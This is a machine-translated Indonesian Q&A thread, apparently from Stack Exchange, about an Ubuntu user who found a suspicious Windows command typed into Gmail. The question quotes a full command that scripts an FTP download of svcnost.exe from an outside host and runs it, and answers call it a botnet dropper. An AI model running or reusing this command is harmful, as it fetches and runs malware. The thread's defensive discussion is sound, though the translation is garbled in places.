Bagaimana cara mengidentifikasi apakah komputer Linux saya diretas?

PC rumahan saya biasanya hidup, tetapi monitor mati. Malam ini saya pulang kerja dan menemukan apa yang tampak seperti upaya hack: di browser saya, Gmail saya terbuka (itu saya), tetapi itu dalam mode penulisan dengan yang berikut di TObidang:

md / c gema buka cCTeamFtp.yi.org 21 >> ik & gema pengguna ccteam10 765824 >> ik & gema biner >> ik & gema dapatkan svcnost.exe >> ik & gema bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe & keluar echo Anda dimiliki

Ini seperti kode baris perintah Windows bagi saya, dan mdawal kode dikombinasikan dengan fakta bahwa Gmail berada dalam mode penulisan, membuatnya jelas bahwa seseorang mencoba menjalankan cmdperintah. Saya kira saya beruntung karena sebenarnya saya tidak menjalankan Windows pada PC ini, tetapi saya memiliki orang lain yang melakukannya. Ini adalah pertama kalinya sesuatu seperti ini terjadi padaku. Saya bukan guru Linux, dan saya tidak menjalankan program lain selain Firefox pada saat itu.

Saya benar-benar yakin bahwa saya tidak menulis ini, dan tidak ada orang lain secara fisik di komputer saya. Juga, saya baru-baru ini mengubah kata sandi Google saya (dan semua kata sandi saya yang lain) menjadi sesuatu seperti vMA8ogd7bvjadi saya tidak berpikir bahwa seseorang meretas akun Google saya.

Apa yang baru saja terjadi? Bagaimana cara seseorang menekan tombol pada komputer saya ketika itu bukan mesin Windows lama nenek yang telah menjalankan malware selama bertahun-tahun, tetapi baru menginstal Ubuntu baru?

Pembaruan:
Biarkan saya membahas beberapa poin dan pertanyaan:

• Saya di Austria, di pedesaan. Router WLAN saya menjalankan WPA2 / PSK dan kata sandi sedang-kuat yang tidak ada dalam kamus; harus brute-force dan kurang dari 50 meter dari sini; tidak mungkin itu diretas.
• Saya menggunakan keyboard kabel USB, jadi sekali lagi sangat tidak mungkin ada orang yang bisa meretasnya.
• Saya tidak menggunakan komputer saya pada saat itu; itu hanya diam di rumah saat aku sedang bekerja. Ini adalah nettop PC yang dipasang di monitor, jadi saya jarang mematikannya.
• Mesin ini baru berumur dua bulan, hanya menjalankan Ubuntu, dan saya tidak menggunakan perangkat lunak aneh atau mengunjungi situs-situs aneh. Ini terutama Stack Exchange, Gmail, dan surat kabar. Tidak ada permainan. Ubuntu diatur untuk selalu memperbarui.
• Saya tidak mengetahui adanya layanan VNC yang berjalan; Saya tentu saja belum menginstal atau mengaktifkannya. Saya juga belum memulai server lain. Saya tidak yakin apakah ada yang berjalan di Ubuntu secara default?
• Saya tahu semua alamat IP dalam aktivitas akun Gmail. Saya cukup yakin Google bukan jalan masuk.
• Saya menemukan Penampil Arsip Log , tetapi saya tidak tahu harus mencari apa. Tolong?

Yang benar-benar ingin saya ketahui adalah, dan apa yang benar-benar membuat saya merasa tidak aman, adalah: bagaimana orang dari Internet dapat menghasilkan penekanan tombol pada mesin saya? Bagaimana saya bisa mencegah hal itu tanpa harus repot-repot? Saya bukan pecandu Linux, saya seorang ayah yang mengotak-atik Windows selama 20+ tahun dan sudah bosan. Dan selama 18+ tahun online, saya belum pernah melihat upaya hack pribadi, jadi ini baru bagi saya.

Saya ragu Anda memiliki sesuatu yang perlu dikhawatirkan. Kemungkinan besar serangan JavaScript yang mencoba melakukan drive dengan mengunduh . Jika Anda khawatir tentang hal ini, mulailah menggunakan NoScript dan AdBlock Plus Firefox Add-Ons.

Bahkan mengunjungi situs yang tepercaya Anda tidak aman karena mereka menjalankan kode JavaScript dari pengiklan pihak ketiga yang bisa berbahaya.

Saya mengambilnya dan menjalankannya dalam VM. Menginstal mirc dan ini adalah log status ... http://pastebin.com/Mn85akMk

Ini adalah serangan otomatis yang mencoba membuat Anda mengunduh mIRC dan bergabung dengan botnet yang akan mengubah Anda menjadi spambot ... Itu membuat VM saya bergabung dan membuat koneksi ke sejumlah alamat jarak jauh yang berbeda, salah satunya adalah autoemail-119.west320.com.

Menjalankannya di Windows 7 saya harus menerima UAC prompt dan mengizinkannya mengakses melalui firewall.

Tampaknya ada banyak laporan dari perintah yang tepat ini di forum lain, dan seseorang bahkan mengatakan bahwa file torrent mencoba untuk mengeksekusinya ketika sudah selesai mengunduh ... Saya tidak yakin bagaimana itu akan mungkin terjadi.

Saya belum pernah menggunakan ini sendiri, tetapi seharusnya bisa menunjukkan kepada Anda koneksi jaringan saat ini sehingga Anda dapat melihat apakah Anda terhubung dengan sesuatu yang tidak normal: http://netactview.sourceforge.net/download.html

Saya setuju dengan @ jb48394 bahwa itu mungkin eksploitasi JavaScript, seperti yang lainnya hari ini.

Fakta bahwa ia mencoba untuk membuka cmdjendela (lihat komentar @ torbengb ) dan menjalankan perintah jahat, daripada hanya mengunduh trojan secara diam-diam di latar belakang, menunjukkan bahwa ia mengeksploitasi beberapa kerentanan di Firefox yang memungkinkannya untuk memasukkan stroke-key, tetapi tidak menjalankan kode.

Ini juga menjelaskan mengapa exploit ini, yang jelas ditulis khusus untuk Windows, juga akan bekerja di Linux: Firefox menjalankan JavaScript dengan cara yang sama di semua OS (setidaknya, ia mencoba untuk :)) . Jika itu disebabkan oleh buffer-overflow atau exploit serupa yang ditujukan untuk Windows, itu hanya akan membuat crash program.

Adapun dari mana kode JavaScript berasal - mungkin iklan Google berbahaya (siklus iklan di Gmail sepanjang hari) . Ini tidak akan menjadi yang pertama kalinya .

Saya menemukan serangan serupa di mesin Linux lain. Sepertinya itu semacam perintah FTP untuk Windows.

Ini tidak menjawab seluruh pertanyaan Anda, tetapi dalam pencarian file log untuk upaya login gagal.

Jika ada lebih dari sekitar lima upaya gagal dalam log Anda, maka seseorang mencoba untuk memecahkannya root. Jika ada upaya yang berhasil untuk masuk rootsaat Anda jauh dari komputer Anda, GANTI PASSWORD ANDA SEGERA !! Maksud saya SEKARANG JUGA! Lebih disukai untuk sesuatu yang alfanumerik, dan sekitar 10 karakter.

Dengan pesan yang Anda dapatkan ( echoperintah) ini benar-benar terdengar seperti beberapa script anak yang belum matang . Jika itu adalah seorang peretas sejati yang tahu apa yang dia lakukan, Anda mungkin masih tidak akan mengetahuinya.

whois laporan west320.com dimiliki oleh Microsoft.

UPnP dan Vino (Sistem -> Preferensi -> Remote Desktop) dikombinasikan dengan kata sandi Ubuntu yang lemah?

Apakah Anda menggunakan repositori yang tidak standar?

DEF CON memiliki kompetisi Wi-Fi setiap tahun mengenai seberapa jauh titik akses Wi-Fi dapat dicapai - yang terakhir saya dengar adalah 250 mil.

Jika Anda benar-benar ingin takut, lihat screenshot dari pusat perintah-n-kontrol botnet Zeus . Tidak ada mesin yang aman, tetapi Firefox di Linux lebih aman daripada yang lain. Lebih baik lagi, jika Anda menjalankan SELinux .